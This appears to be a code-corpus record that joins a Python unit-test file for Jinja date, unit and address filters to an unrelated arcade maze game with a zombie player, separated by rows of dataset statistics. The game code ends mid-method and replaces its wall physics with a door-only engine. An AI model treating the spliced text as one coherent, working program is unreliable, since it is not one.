@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_unit_input_label(self):
self.assertEqual(format_unit_input_label('length-meter'), 'm')
self.assertEqual(format_unit_input_label('length-centimeter'), 'cm')
self.assertEqual(format_unit_input_label('length-mile'), 'mi')
self.assertEqual(format_unit_input_label('length-kilometer'), 'km')
self.assertEqual(format_unit_input_label('area-square-meter'), 'm²')
self.assertEqual(format_unit_input_label('area-square-centimeter'), 'cm²')
self.assertEqual(format_unit_input_label('area-square-kilometer'), 'km²')
self.assertEqual(format_unit_input_label('area-square-mile'), 'sq mi')
self.assertEqual(format_unit_input_label('area-hectare'), 'ha')
self.assertEqual(format_unit_input_label('area-acre'), 'ac')
self.assertEqual(format_unit_input_label('volume-cubic-meter'), 'm³')
self.assertEqual(format_unit_input_label('volume-cubic-centimeter'), 'cm³')
self.assertEqual(format_unit_input_label('volume-liter'), 'l')
self.assertEqual(format_unit_input_label('volume-hectoliter'), 'hl')
self.assertEqual(format_unit_input_label('volume-megaliter'), 'Ml')
self.assertEqual(format_unit_input_label('duration-hour'), 'hr')
self.assertEqual(format_unit_input_label('duration-hour', 'long'), 'hours')
self.assertEqual(format_unit_input_label('duration-year'), 'yr')
self.assertEqual(format_unit_input_label('duration-year', 'long'), 'years')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='cy'))
def test_format_unit_input_label_welsh(self):
self.assertEqual(format_unit_input_label('duration-hour'), 'awr')
self.assertEqual(format_unit_input_label('duration-hour', 'long'), 'awr')
self.assertEqual(format_unit_input_label('duration-year'), 'bl')
self.assertEqual(format_unit_input_label('duration-year', 'long'), 'flynedd')
def test_format_year_month_duration(self):
with self.app_request_context('/'):
self.assertEqual(format_duration({'years': 5, 'months': 4}), '5 years 4 months')
self.assertEqual(format_duration({'years': 5, 'months': 0}), '5 years')
self.assertEqual(format_duration({'years': 0, 'months': 4}), '4 months')
self.assertEqual(format_duration({'years': 1, 'months': 1}), '1 year 1 month')
self.assertEqual(format_duration({'years': 0, 'months': 0}), '0 months')
def test_format_year_duration(self):
with self.app_request_context('/'):
self.assertEqual(format_duration({'years': 5}), '5 years')
self.assertEqual(format_duration({'years': 1}), '1 year')
self.assertEqual(format_duration({'years': 0}), '0 years')
def test_format_month_duration(self):
with self.app_request_context('/'):
self.assertEqual(format_duration({'months': 5}), '5 months')
self.assertEqual(format_duration({'months': 1}), '1 month')
self.assertEqual(format_duration({'months': 0}), '0 months')
def test_format_unordered_list(self):
list_items = [['item 1', 'item 2']]
formatted_value = format_unordered_list(self.autoescape_context, list_items)
expected_value = '<ul><li>item 1</li><li>item 2</li></ul>'
self.assertEqual(expected_value, formatted_value)
def test_format_unordered_list_with_no_input(self):
list_items = []
formatted_value = format_unordered_list(self.autoescape_context, list_items)
self.assertEqual('', formatted_value)
def test_format_unordered_list_with_empty_list(self):
list_items = [[]]
formatted_value = format_unordered_list(self.autoescape_context, list_items)
self.assertEqual('', formatted_value)
def test_max_value(self):
# Given
two_ints = (1, 2)
# When
max_of_two = max_value(*two_ints)
# Then
self.assertEqual(max_of_two, 2)
def test_max_value_none(self):
# Given
one_int = (1, None)
# When
max_of_two = max_value(*one_int)
# Then
self.assertEqual(max_of_two, 1)
def test_max_value_undefined(self):
# Given
args = ('foo', Undefined())
# When
with self.assertRaises(Exception) as exception:
max_value(*args)
# Then
self.assertIn(
"Cannot determine maximum of incompatible types max(<class 'str'>,"
" <class 'jinja2.runtime.Undefined'>)", str(exception.exception))
def test_max_values_incompatible(self):
# Given
args = (1, 'abc')
# When
with self.assertRaises(Exception) as exception:
max_value(*args)
# Then
self.assertIn(
"Cannot determine maximum of incompatible types max(<class 'int'>,"
" <class 'str'>)", str(exception.exception))
def test_max_values_compatible(self):
# Given
args = (-1, True)
# When
max_of_two = max_value(*args)
# Then
self.assertEqual(max_of_two, True)
def test_max_value_str(self):
# Given
two_str = ('a', 'abc')
# When
max_of_two = max_value(*two_str)
# Then
self.assertEqual(max_of_two, 'abc')
def test_max_value_date(self):
# Given
now = datetime.utcnow()
then = now - timedelta(seconds=60)
two_dates = (then, now)
# When
max_of_two = max_value(*two_dates)
# Then
self.assertEqual(max_of_two, now)
def test_min_value(self):
# Given
two_ints = (1, 2)
# When
min_of_two = min_value(*two_ints)
# Then
self.assertEqual(min_of_two, 1)
def test_min_value_none(self):
# Given
one_int = (1, None)
# When
min_of_two = min_value(*one_int)
# Then
self.assertEqual(min_of_two, 1)
def test_min_value_undefined(self):
# Given
args = ('foo', Undefined())
# When
with self.assertRaises(Exception) as exception:
min_value(*args)
# Then
self.assertIn(
"Cannot determine minimum of incompatible types min(<class 'str'>,"
" <class 'jinja2.runtime.Undefined'>)", str(exception.exception))
def test_min_values_incompatible(self):
# Given
args = (1, 'abc')
# When
with self.assertRaises(Exception) as exception:
min_value(*args)
# Then
self.assertIn(
"Cannot determine minimum of incompatible types min(<class 'int'>,"
" <class 'str'>)", str(exception.exception))
def test_min_values_compatible(self):
# Given
args = (-1, True)
# When
min_of_two = min_value(*args)
# Then
self.assertEqual(min_of_two, -1)
def test_min_value_str(self):
# Given
two_str = ('a', 'abc')
# When
min_of_two = min_value(*two_str)
# Then
self.assertEqual(min_of_two, 'a')
def test_min_value_date(self):
# Given
now = datetime.utcnow()
then = now - timedelta(seconds=60)
two_dates = (then, now)
# When
min_of_two = min_value(*two_dates)
# Then
self.assertEqual(min_of_two, then)
def test_get_question_title_with_title_value(self):
# Given
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question',
'title': 'question_title'
}
}
)
# When
title = get_question_title(context, question_id)
# Then
self.assertEqual(title, 'question_title')
def test_get_question_title_with_question_titles(self):
# Given
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question'
},
'content': {
'question_titles': {
'question': 'default_question_title'
}
}
}
)
# When
title = get_question_title(context, question_id)
# Then
self.assertEqual(title, 'default_question_title')
def test_get_answer_label_with_answer_label(self):
# Given
answer_id = 'answer'
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question',
'answers': [{
'id': 'answer',
'label': 'answer_label'
}]
}
}
)
# When
answer_label = get_answer_label(context, answer_id, question_id)
# Then
self.assertEqual(answer_label, 'answer_label')
def test_get_answer_label_with_no_answer_label_and_title(self):
# Given
answer_id = 'answer'
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question',
'title': 'question_title',
'answers': [{
'id': 'answer'
}]
}
}
)
# When
answer_label = get_answer_label(context, answer_id, question_id)
# Then
self.assertEqual(answer_label, 'question_title')
def test_get_answer_label_with_no_answer_label_and_question_titles(self):
# Given
answer_id = 'answer'
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question',
'answers': [{
'id': 'answer'
}]
},
'content': {
'question_titles': {
'question': 'default_question_title'
}
}
}
)
# When
answer_label = get_answer_label(context, answer_id, question_id)
# Then
self.assertEqual(answer_label, 'default_question_title')
def test_offset_date_from_day(self):
test_cases = [
# (Input Date, offset, day of week, expected output)
('2018-08-10', {}, 'SU', '2018-08-05'), # Friday outputs previous Sunday
('2018-08-05', {}, 'SU', '2018-07-29'), # Sunday outputs previous Sunday (Must be a full Sunday)
('2018-08-06', {}, 'SU', '2018-08-05'), # Monday outputs previous Sunday
('2018-08-06', {'days': -1}, 'SU', '2018-08-04'), # Previous sunday with -1 day offset
            ('2018-08-05', {'weeks': 1}, 'SU', '2018-08-05'), # Previous Sunday with +1 week offset, back to input
('2018-08-10', {}, 'FR', '2018-08-03'), # Friday outputs previous Friday
('2018-08-10T13:32:20.365665', {}, 'FR', '2018-08-03'), # Ensure we can handle datetime input
('2018-08-10', {'weeks': 4}, 'FR', '2018-08-31'), # Friday outputs previous Friday + 4 weeks
('2018-08-10', {'bad_period': 4}, 'FR', '2018-08-03'), # Friday outputs previous Friday + nothing
('2018-08-10', {'years': 1}, 'FR', '2019-08-03'), # Friday outputs previous Friday + 1 year
('2018-08-10', {'years': 1, 'weeks': 1, 'days': 1}, 'FR', '2019-08-11'), # Friday outputs previous Friday + 1 year + 1 week + 1 day
]
for case in test_cases:
self.assertEqual(calculate_offset_from_weekday_in_last_whole_week(*case[0:3]), case[3])
def test_bad_day_of_week_offset_date_from_day(self):
with self.assertRaises(Exception):
calculate_offset_from_weekday_in_last_whole_week('2018-08-10', {}, 'BA')
def test_offset_date_defaults_to_now_if_date_not_passed(self):
with patch('app.jinja_filters.datetime') as mock_datetime:
# pylint: disable=unnecessary-lambda
mock_datetime.utcnow.return_value = datetime(2018, 8, 10)
mock_datetime.strftime.side_effect = lambda *args, **kw: datetime.strftime(*args, **kw)
result = calculate_offset_from_weekday_in_last_whole_week(None, {}, 'SU')
self.assertEqual(result, '2018-08-05')
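    # --- Editor's note (assumption, not part of the original file): the filter
    # under test lives in app.jinja_filters; a minimal sketch of the "weekday in
    # last whole week" logic exercised above (not the app's actual code):
    #
    #     from dateutil.relativedelta import relativedelta, SU
    #     base = datetime.strptime('2018-08-10', '%Y-%m-%d')
    #     last_sunday = base + relativedelta(days=-1, weekday=SU(-1))  # 2018-08-05
    #     # extra offsets such as {'weeks': 1} are then applied on top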
def test_format_date_custom(self):
test_cases = [
# Input Date, date format, show year
('2018-08-14', 'EEEE d MMMM YYYY', 'Tuesday 14 August 2018'),
('2018-08-14', 'EEEE d MMMM', 'Tuesday 14 August'),
('2018-08-14', 'EEEE d', 'Tuesday 14'),
('2018-08-14', 'd MMMM YYYY', '14 August 2018'),
]
with self.app_request_context('/'):
for case in test_cases:
self.assertEqual(
format_date_custom(self.autoescape_context, *case[0:2]),
"<span class='date'>{}</span>".format(case[2])
)
def test_format_date_range_no_repeated_month_year(self):
test_cases = [
# Start Date, End Date, Date Format, Output Expected First, Output Expected Second
('2018-08-14', '2018-08-16', 'EEEE d MMMM YYYY', 'Tuesday 14', 'Thursday 16 August 2018'),
('2018-07-31', '2018-08-16', 'EEEE d MMMM YYYY', 'Tuesday 31 July', 'Thursday 16 August 2018'),
('2017-12-31', '2018-08-16', 'EEEE d MMMM YYYY', 'Sunday 31 December 2017', 'Thursday 16 August 2018'),
('2017-12-31', '2018-08-16', 'MMMM YYYY', 'December 2017', 'August 2018'),
('2018-08-14', '2018-08-16', 'MMMM YYYY', 'August 2018', 'August 2018'),
('2017-12-31', '2018-08-16', 'YYYY', '2017', '2018'),
('2017-07-31', '2018-08-16', 'YYYY', '2017', '2018'),
('2018-08-14', '2018-08-16', 'EEEE d', 'Tuesday 14', 'Thursday 16')
]
with self.app_request_context('/'):
for case in test_cases:
self.assertEqual(
format_date_range_no_repeated_month_year(self.autoescape_context, *case[0:3]),
"<span class='date'>{}</span> to <span class='date'>{}</span>".format(case[3], case[4])
)
@patch('app.jinja_filters.format_unordered_list')
def test_format_repeated_summaries_unformatted(self, patched_format): # pylint: disable=no-self-use
test_cases = [
# (input list, expected output)
([['John', 'Smith'], [['Jane', 'Sarah'], ['Smith', 'Smythe']]], ['John Smith', 'Jane Smith', 'Sarah Smythe']),
([['John', 'Smith']], ['John Smith']),
([['John', 'Smith'], ['Andy', 'Smith'], ['David', 'Smith']], ['John Smith', 'Andy Smith', 'David Smith']),
([[['Jane', 'Sarah'], ['Smith', 'Smith']]], ['Jane Smith', 'Sarah Smith']),
([[['David', 'Sarah'], ['Smith', 'Smith']]], ['David Smith', 'Sarah Smith']),
([[['David', 'Sarah'], ['', 'Smith']]], ['David', 'Sarah Smith']),
([['John', 'Smith'], [[], []]], ['John Smith'])
]
for case in test_cases:
format_repeating_summary(None, case[0])
# Format unordered list takes a list of lists
patched_format.assert_called_with(None, [[Markup(x) for x in case[1]]])
def test_format_repeated_summaries_no_input(self):
self.assertEqual('', format_repeating_summary(None, []))
def test_format_repeated_summaries_delimiters(self):
self.autoescape_context = Mock(autoescape=True)
output = format_repeating_summary(self.autoescape_context, [['', '51 Testing Gardens', '', 'Bristol', 'BS9 1AW']], delimiter=', ')
self.assertEqual(output, '<ul><li>51 Testing Gardens, Bristol, BS9 1AW</li></ul>')
def test_format_address_list_undefined_values(self):
user_entered_address = [Undefined(), Undefined(), Undefined(), Undefined(), Undefined()]
metadata_address = ['123', 'Testy', 'Place', 'Newport', 'NP5 7AR']
self.assertEqual('123<br />Testy<br />Place<br />Newport<br />NP5 7AR',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list_missing_values(self):
user_entered_address = ['44', 'Testing', '', 'Swansea', '']
metadata_address = ['123', 'Testy', 'Place', 'Newport', 'NP5 7AR']
self.assertEqual('44<br />Testing<br />Swansea',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list_None_value(self):
user_entered_address = [None, None, None, None, None]
metadata_address = [None, None, None, None, None]
with self.assertRaises(Exception):
format_address_list(user_entered_address, metadata_address)
def test_format_address_list_no_values_in_answer(self):
user_entered_address = ['', '', '', '', '']
metadata_address = ['123', 'Testy', 'Place', 'Newport', 'NP5 7AR']
self.assertEqual('123<br />Testy<br />Place<br />Newport<br />NP5 7AR',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list_no_metadata(self):
user_entered_address = ['44', 'Testing', 'Gardens', 'Swansea', 'SA1 1AA']
metadata_address = []
self.assertEqual('44<br />Testing<br />Gardens<br />Swansea<br />SA1 1AA',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list(self):
user_entered_address = ['44', 'Testing', 'Gardens', 'Swansea', 'SA1 1AA']
metadata_address = ['123', 'Testy', 'Place', 'Newport', 'NP5 7AR']
self.assertEqual('44<br />Testing<br />Gardens<br />Swansea<br />SA1 1AA',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list_concatenated_list_no_values(self):
answer_address = ['', '', '']
metadata_address = ['', '', '']
with self.assertRaises(Exception) as error:
format_address_list(answer_address, metadata_address)
self.assertEqual('No valid address passed to format_address_list filter', error.exception.args[0])
| 38.005208
| 143
| 0.615952
| 4,321
| 36,485
| 4.926637
| 0.093265
| 0.11274
| 0.123309
| 0.052847
| 0.757187
| 0.680994
| 0.60668
| 0.528091
| 0.441798
| 0.405909
| 0
| 0.046522
| 0.25531
| 36,485
| 959
| 144
| 38.044838
| 0.736732
| 0.04495
| 0
| 0.324324
| 0
| 0.001689
| 0.176201
| 0.030794
| 0
| 0
| 0
| 0
| 0.302365
| 1
| 0.14527
| false
| 0.006757
| 0.013514
| 0
| 0.160473
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe90eb5d4db9dcb42eabad6cf0007baab0fc7833
| 18,598
|
py
|
Python
|
levels/sombie.py
|
superhasduper/PythonGames
|
64995d3e0b619006a2cf80d0da3c0fdf97db6fd9
|
[
"MIT"
] | 1
|
2019-07-07T19:55:39.000Z
|
2019-07-07T19:55:39.000Z
|
levels/sombie.py
|
superhasduper/PythonGames
|
64995d3e0b619006a2cf80d0da3c0fdf97db6fd9
|
[
"MIT"
] | null | null | null |
levels/sombie.py
|
superhasduper/PythonGames
|
64995d3e0b619006a2cf80d0da3c0fdf97db6fd9
|
[
"MIT"
] | null | null | null |
import arcade
import os
SPRITE_SCALING = 0.5
SPRITE_NATIVE_SIZE = 128
SPRITE_SIZE = int(SPRITE_NATIVE_SIZE * SPRITE_SCALING)
SCREEN_WIDTH = SPRITE_SIZE * 14
SCREEN_HEIGHT = SPRITE_SIZE * 10
MOVEMENT_SPEED = 5
COIN_SCALE = 0.7
class Room:
"""
This class holds all the information about the
different rooms.
"""
def __init__(self):
# You may want many lists. Lists for coins, monsters, etc.
self.wall_list = None
self.coin_list = None
self.door_list = None
self.smallpotion_list = None
self.bigpotion_list = None
# This holds the background images. If you don't want changing
# background images, you can delete this part.
self.background = None
self.score = 0
def setup_room_1():
"""
Create and return room 1.
If your program gets large, you may want to separate this into different
files.
"""
room = Room()
""" Set up the game and initialize the variables. """
# Sprite lists
room.wall_list = arcade.SpriteList()
room.door_list = arcade.SpriteList()
room.coin_list = arcade.SpriteList()
room.smallpotion_list = arcade.SpriteList()
room.bigpotion_list = arcade.SpriteList()
for y in (0, SCREEN_HEIGHT - SPRITE_SIZE):
# Loop for each box going across
for x in range(0, SCREEN_WIDTH, SPRITE_SIZE):
wall = arcade.Sprite("gravel_dirt.png", SPRITE_SCALING)
wall.left = x
wall.bottom = y
room.wall_list.append(wall)
# Create left and right column of boxes
for x in (0, SCREEN_WIDTH - SPRITE_SIZE):
# Loop for each box going across
for y in range(SPRITE_SIZE, SCREEN_HEIGHT - SPRITE_SIZE, SPRITE_SIZE):
# Skip making a block 4 and 5 blocks up on the right side
if (y != SPRITE_SIZE * 4 and y != SPRITE_SIZE * 5) or x == 0:
wall = arcade.Sprite("gravel_dirt.png", SPRITE_SCALING)
wall.left = x
wall.bottom = y
room.wall_list.append(wall)
for x in (0, SCREEN_WIDTH - SPRITE_SIZE):
# Loop for each box going across
for y in range(SPRITE_SIZE, SCREEN_HEIGHT - SPRITE_SIZE, SPRITE_SIZE):
if not (y != SPRITE_SIZE * 4 and y != SPRITE_SIZE * 5) or x == 0:
door = arcade.Sprite("fence.png", SPRITE_SCALING)
door.left = x
door.bottom = y
room.door_list.append(door)
wall = arcade.Sprite("gravel_dirt.png", SPRITE_SCALING)
wall.left = 7 * SPRITE_SIZE
wall.bottom = 5 * SPRITE_SIZE
room.wall_list.append(wall)
# If you want coins or monsters in a level, then add that code here.
# Load the background image for this level.
room.background = arcade.load_texture("g.png")
for i in range(300,600,75):
coin = arcade.Sprite("coin.png",COIN_SCALE)
coin.center_x = i
coin.center_y = 500
room.coin_list.append(coin)
smallpotion = arcade.Sprite("big.png",0.05)
smallpotion.center_x = 100
smallpotion.center_y = 900
room.smallpotion_list.append(smallpotion)
return room
def setup_room_2():
"""
Create and return room 2.
"""
room = Room()
""" Set up the game and initialize the variables. """
# Sprite lists
room.door_list = arcade.SpriteList()
room.wall_list = arcade.SpriteList()
room.coin_list = arcade.SpriteList()
room.smallpotion_list = arcade.SpriteList()
room.bigpotion_list = arcade.SpriteList()
# -- Set up the walls
# Create bottom and top row of boxes
    # This y loop runs over just two values: 0 and the row just under the top of the window
for y in (0, SCREEN_HEIGHT - SPRITE_SIZE):
# Loop for each box going across
for x in range(0, SCREEN_WIDTH, SPRITE_SIZE):
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = x
wall.bottom = y
room.wall_list.append(wall)
# Create left and right column of boxes
for x in (0, SCREEN_WIDTH - SPRITE_SIZE):
# Loop for each box going across
for y in range(SPRITE_SIZE, SCREEN_HEIGHT - SPRITE_SIZE, SPRITE_SIZE):
# Skip making a block 4 and 5 blocks up
if (y != SPRITE_SIZE * 4 and y != SPRITE_SIZE * 5) or x != 0:
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = x
wall.bottom = y
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 1 * SPRITE_SIZE
wall.bottom = 6 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 1 * SPRITE_SIZE
wall.bottom = 3 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 2 * SPRITE_SIZE
wall.bottom = 5.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 2 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 3 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 4 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 4 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 2 * SPRITE_SIZE
wall.bottom = 5.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 2 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 3 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 4 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 5 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 5.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 4 * SPRITE_SIZE
wall.bottom = 2.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom =3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 0.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 7 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 7 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 9 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 2.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 5.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 9 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 7.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 8 * SPRITE_SIZE
room.wall_list.append(wall)
room.background = arcade.load_texture("g.png")
bigpotion = arcade.Sprite("small.png",0.05)
bigpotion.center_x = 800
bigpotion.center_y = 100
room.bigpotion_list.append(bigpotion)
return room
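# --- Editor's note (assumption, not part of the original file): the long run of
# near-identical wall placements above could be collapsed into a loop over
# (column, row) grid positions, e.g.:
#
#     snow_positions = [(1, 6), (1, 3), (2, 5.5), (2, 3.5), (3, 3.5), (4, 3.5)]
#     for col, row in snow_positions:
#         wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
#         wall.left = col * SPRITE_SIZE
#         wall.bottom = row * SPRITE_SIZE
#         room.wall_list.append(wall)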
class MyGame(arcade.Window):
""" Main application class. """
def __init__(self, width, height):
"""
Initializer
"""
super().__init__(width, height,"Tocate el pnnywise")
# Set the working directory (where we expect to find files) to the same
# directory this .py file is in. You can leave this out of your own
# code, but it is needed to easily run the examples using "python -m"
# as mentioned at the top of this program.
file_path = os.path.dirname(os.path.abspath(__file__))
os.chdir(file_path)
# Sprite lists
self.current_room = 0
# Set up the player
self.game_over = False
self.door_list = None
self.rooms = None
self.score = 0
self.coin_list = None
self.player_sprite = None
self.physics_engine = None
self.smallpotion_list = None
self.bigpotion_list = None
def setup(self):
""" Set up the game and initialize the variables. """
# Set up the player
self.player_sprite = arcade.AnimatedWalkingSprite()
self.score = 0
self.coin_list = arcade.SpriteList()
self.smallpotion_list = arcade.SpriteList()
self.bigpotion_list = arcade.SpriteList()
self.player_sprite.center_x = 100
self.player_sprite.center_y = 150
character_scale = 0.75
self.player_sprite.stand_right_textures = []
self.player_sprite.stand_right_textures.append(arcade.load_texture("zombie_stand.png",
scale=character_scale))
self.player_sprite.stand_left_textures = []
self.player_sprite.stand_left_textures.append(arcade.load_texture("zombie_stand.png",
scale=character_scale, mirrored=True))
self.player_sprite.walk_right_textures = []
self.player_sprite.walk_right_textures.append(arcade.load_texture("zombie_walk1.png",
scale=character_scale))
self.player_sprite.walk_right_textures.append(arcade.load_texture("zombie_walk2.png",
scale=character_scale))
self.player_sprite.walk_left_textures = []
self.player_sprite.walk_left_textures.append(arcade.load_texture("zombie_walk1.png",
scale=character_scale, mirrored=True))
self.player_sprite.walk_left_textures.append(arcade.load_texture("zombie_walk2.png",
scale=character_scale, mirrored=True))
# Our list of rooms
self.rooms = []
# Create the rooms. Extend the pattern for each room.
room = setup_room_1()
self.rooms.append(room)
room = setup_room_2()
self.rooms.append(room)
# Our starting room number
self.current_room = 0
# Create a physics engine for this room
        self.physics_engine = arcade.PhysicsEngineSimple(self.player_sprite, self.rooms[self.current_room].wall_list)
        # NOTE: the next line replaces the engine above, so only door collisions are
        # active until update() rebuilds the engine with wall_list on a room change.
        self.physics_engine = arcade.PhysicsEngineSimple(self.player_sprite, self.rooms[self.current_room].door_list)
def on_draw(self):
"""
Render the screen.
"""
# This command has to happen before we start drawing
arcade.start_render()
# Draw the background texture
arcade.draw_texture_rectangle(SCREEN_WIDTH // 2, SCREEN_HEIGHT // 2,
SCREEN_WIDTH, SCREEN_HEIGHT, self.rooms[self.current_room].background)
# Draw all the walls in this room
self.rooms[self.current_room].door_list.draw()
self.rooms[self.current_room].wall_list.draw()
self.rooms[self.current_room].coin_list.draw()
self.rooms[self.current_room].bigpotion_list.draw()
self.rooms[self.current_room].smallpotion_list.draw()
# If you have coins or monsters, then copy and modify the line
# above for each list.
output = "Score: {}".format(self.score)
arcade.draw_text(output, 10, 20, arcade.color.WHITE, 14)
self.player_sprite.draw()
def on_key_press(self, key, modifiers):
"""Called whenever a key is pressed. """
if key == arcade.key.W:
self.player_sprite.change_y = MOVEMENT_SPEED
elif key == arcade.key.S:
self.player_sprite.change_y = -MOVEMENT_SPEED
elif key == arcade.key.A:
self.player_sprite.change_x = -MOVEMENT_SPEED
elif key == arcade.key.D:
self.player_sprite.change_x = MOVEMENT_SPEED
def on_key_release(self, key, modifiers):
"""Called when the user releases a key. """
if key == arcade.key.W or key == arcade.key.S:
self.player_sprite.change_y = 0
elif key == arcade.key.A or key == arcade.key.D:
self.player_sprite.change_x = 0
def update(self, delta_time):
""" Movement and game logic """
self.player_sprite.update_animation()
# Call update on all sprites (The sprites don't do much in this
# example though.)
self.physics_engine.update()
# Do some logic here to figure out what room we are in, and if we need to go
# to a different room.
if self.player_sprite.center_x > SCREEN_WIDTH and self.current_room == 0:
self.current_room = 1
